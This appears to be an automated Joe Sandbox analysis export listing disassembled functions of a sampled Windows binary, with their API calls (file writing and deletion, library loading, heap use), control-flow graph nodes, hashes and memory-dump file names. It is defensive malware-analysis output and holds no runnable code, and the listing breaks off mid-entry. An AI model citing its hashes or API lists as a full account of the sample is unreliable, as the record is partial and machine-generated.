                                      Function 00401B8F Relevance: 4.7, APIs: 3, Instructions: 233libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                        • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                                        • Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                      • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                      • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                      • String ID:
                                      • API String ID: 983379767-0
                                      • Opcode ID: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
                                      • Instruction ID: 657320b8a0b9e8c73ad23a805e8a4a11547555e009ba7fb8d64ba55fc2021fd8
                                      • Opcode Fuzzy Hash: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
                                      • Instruction Fuzzy Hash: 22514AB59047007AE2007BB2DD82E7F66AEDBD4709F10893FF944790D2C93C984996AE
                                      Function 0040B020 Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 892 40b020-40b034 893 40b127-40b12d 892->893 894 40b03a-40b03e 892->894 895 40b040-40b068 SetFilePointer 894->895 896 40b06b-40b075 894->896 895->896 897 40b077-40b082 896->897 898 40b0e8-40b0f3 call 40aa40 896->898 899 40b0d3-40b0e5 897->899 900 40b084-40b085 897->900 907 40b115-40b122 898->907 908 40b0f5-40b112 WriteFile 898->908 902 40b087-40b08a 900->902 903 40b0bc-40b0d0 900->903 905 40b0a7-40b0b9 902->905 906 40b08c-40b08d 902->906 909 40b091-40b0a4 memcpy 906->909 907->909
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B058
                                      • memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B092
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FilePointermemcpy
                                      • String ID:
                                      • API String ID: 1104741977-0
                                      • Opcode ID: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                      • Instruction ID: 223037c69186752c1411635bf46ae5d03fa463101b4e1ddb65380de8071f5603
                                      • Opcode Fuzzy Hash: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                      • Instruction Fuzzy Hash: 93313A392047019FC320DF29D844E5BB7E1EFD4314F04882EE59A97750D335E919CBA6
                                      Function 0040DEC0 Relevance: 4.6, APIs: 3, Instructions: 53memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 910 40dec0-40dee7 TlsGetValue 911 40df06-40df25 RtlReAllocateHeap 910->911 912 40dee9-40df04 RtlAllocateHeap 910->912 913 40df27-40df4d call 40e3a0 911->913 912->913
                                      APIs
                                      • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                      • RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                      • RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocateHeap$Value
                                      • String ID:
                                      • API String ID: 2497967046-0
                                      • Opcode ID: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                      • Instruction ID: 93a72ebc0765164a1c418c05f64e83f02c193a946cd328b9657e87a1490d81f0
                                      • Opcode Fuzzy Hash: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                      • Instruction Fuzzy Hash: F111B974A00208EFCB04DF98D894E9ABBB6FF88314F20C159F9099B355D735AA41DB94
                                      Function 0040A6C5 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 916 40a6c5-40a6d2 917 40a6d4-40a706 wcsncpy wcslen 916->917 918 40a73d 916->918 919 40a71e-40a726 917->919 920 40a73f-40a742 918->920 921 40a708-40a70f 919->921 922 40a728-40a73b CreateDirectoryW 919->922 923 40a711-40a714 921->923 924 40a71b 921->924 922->920 923->924 925 40a716-40a719 923->925 924->919 925->922 925->924
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CreateDirectorywcslenwcsncpy
                                      • String ID:
                                      • API String ID: 961886536-0
                                      • Opcode ID: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                      • Instruction ID: 5eb92d4f139d310a1ce384b3b75a423d404f976685da56e70024377017fd7883
                                      • Opcode Fuzzy Hash: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                      • Instruction Fuzzy Hash: 3E0167B180131896CB24DB64CC8DEBA73B8DF04304F6086BBE415E71D1E779DAA4DB5A
                                      Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 926 408dee-408e26 memset InitCommonControlsEx CoInitialize
                                      APIs
                                      • memset.MSVCRT ref: 00408DFB
                                      • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                      • CoInitialize.OLE32(00000000), ref: 00408E1D
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CommonControlsInitInitializememset
                                      • String ID:
                                      • API String ID: 2179856907-0
                                      • Opcode ID: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                      • Instruction ID: d18f3e268914b4fee2ab689e9e6bda8f6ab82eec5aee9dd7765ec6ce908ab83c
                                      • Opcode Fuzzy Hash: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                      • Instruction Fuzzy Hash: 12E08CB088430CBBEB009BD0DC0EF8DBB7CEB00315F0041A4F904A2280EBB466488B95
                                      Function 004098C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(008C8F58,008C8F58,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: $0A
                                      • API String ID: 1431749950-513306843
                                      • Opcode ID: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                      • Instruction ID: a83057451cf148fd94e5dae0918d05dd15dd477b401c26288c9a060c20ad275f
                                      • Opcode Fuzzy Hash: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                      • Instruction Fuzzy Hash: E7C01231619201BBD710EA14C904B57BBE5EB50345F04C439B044912B0C338CC44D705
                                      Function 0040ADC0 Relevance: 3.1, APIs: 2, Instructions: 65memoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040D498: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                        • Part of subcall function 0040D498: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040ADF3
                                      • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AE15
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                                      • String ID:
                                      • API String ID: 3705299215-0
                                      • Opcode ID: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                      • Instruction ID: 12139a0eb1477c71ece9156acb4b07c5ee84e209973367f4cf7a68f803bf58ce
                                      • Opcode Fuzzy Hash: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                      • Instruction Fuzzy Hash: C1119331140300ABC2305F1AEC44B57BBF9EB85764F14863EF5A5A73E0C7759C158BA9
                                      Function 0040DBCA Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040DD1D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DBDB,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040DD5E
                                      • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                      • memset.MSVCRT ref: 0040DC35
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Heap$AllocateFreememset
                                      • String ID:
                                      • API String ID: 2774703448-0
                                      • Opcode ID: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                      • Instruction ID: c1bdd2e89517895a38d7a8cc2bcc280f97e8981c2924b00dcd90f9207400bfe8
                                      • Opcode Fuzzy Hash: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                      • Instruction Fuzzy Hash: E51167729043149BC320DF59DC80A8BBBE8EF88B10F01492EB988A7351D774E804CBA5
                                      Function 0040DE30 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                      • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                        • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(008C0000,00000000,0000000C,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6AE
                                        • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(008C0000,00000000,00000010,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6C2
                                        • Part of subcall function 0040E6A0: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6EB
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocHeap$CreateValue
                                      • String ID:
                                      • API String ID: 493873155-0
                                      • Opcode ID: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                      • Instruction ID: f6fb69b35e6ce2edff263c55ffd8902d3e18a9f91630c6f11d167ca4d15ccc07
                                      • Opcode Fuzzy Hash: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                      • Instruction Fuzzy Hash: 4ED012309C8304ABE7402FB1BC0A7843B789708765F604835F509572D1D9BA6090495C
                                      Function 0040A7B9 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFileAttributesW.KERNEL32(00000002,00000080,0040A7F2,008C8F58,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A7D0
                                      • DeleteFileW.KERNELBASE(00000000,0040A7F2,008C8F58,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A7DA
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: File$AttributesDelete
                                      • String ID:
                                      • API String ID: 2910425767-0
                                      • Opcode ID: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                      • Instruction ID: f7dd43ce8ab679ab9acf2fbd66ade7664d9bbbd5be98dbe0a51a073a4b2bc51f
                                      • Opcode Fuzzy Hash: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                      • Instruction Fuzzy Hash: 00D09E30408300B6D7555B20C90D75ABAF17F84745F14C43AF485514F1D7798C65E70A
                                      Function 0040A9D0 Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040AA13
                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AA1B
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CloseFreeHandleHeap
                                      • String ID:
                                      • API String ID: 1642312469-0
                                      • Opcode ID: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                      • Instruction ID: 9ff7f62518d4b0577bac71a3516b051fbd3d19e36237879e48dc57cbe5217eec
                                      • Opcode Fuzzy Hash: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                      • Instruction Fuzzy Hash: E0F05E32600200A7CA216B5AED05A8BBBB2EB85764B11853EF124314F5CB355860DB5D
                                      Function 00402BFA Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                        • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                      • GetShortPathNameW.KERNEL32(008C8F58,008C8F58,00002710), ref: 00402C34
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 00409B80: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B8C
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                        • Part of subcall function 0040DF50: HeapFree.KERNEL32(008C0000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                      • String ID:
                                      • API String ID: 192546213-0
                                      • Opcode ID: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
                                      • Instruction ID: 7a2999830b1481a9d7ef80217fec4737815e267699ad494388d5f61b71452053
                                      • Opcode Fuzzy Hash: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
                                      • Instruction Fuzzy Hash: F6012D75508201BAE5007BA1DD06D3F76A9EFD0718F10CD3EB944B50E2CA3D9C599A5E
                                      Function 0040AA40 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040AA08,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA67
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                      • Instruction ID: b59f1f917ceac4f5cea587e7357412edb8aff685aadda2d04846933fd6210d73
                                      • Opcode Fuzzy Hash: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                      • Instruction Fuzzy Hash: 0AF09276105700AFD720DF58D948F97BBE8EB58721F10C82EE69AD3690C770E850DB61
                                      Function 00402BC1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: InfoNativeSystem
                                      • String ID:
                                      • API String ID: 1721193555-0
                                      • Opcode ID: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                      • Instruction ID: e96e1892c4c724b03879bd5233d00e0abab71770c233aa8573b83279bd435b66
                                      • Opcode Fuzzy Hash: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                      • Instruction Fuzzy Hash: E6D0126081824986D750BE65850979BB3ECE700304F60883AD085561C1F7BCE9D99657
                                      Function 00409BA0 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                      • Instruction ID: 6d87291edcf2eeb8e990bf82b01346f6326b2aefffcea0088477b931f0527044
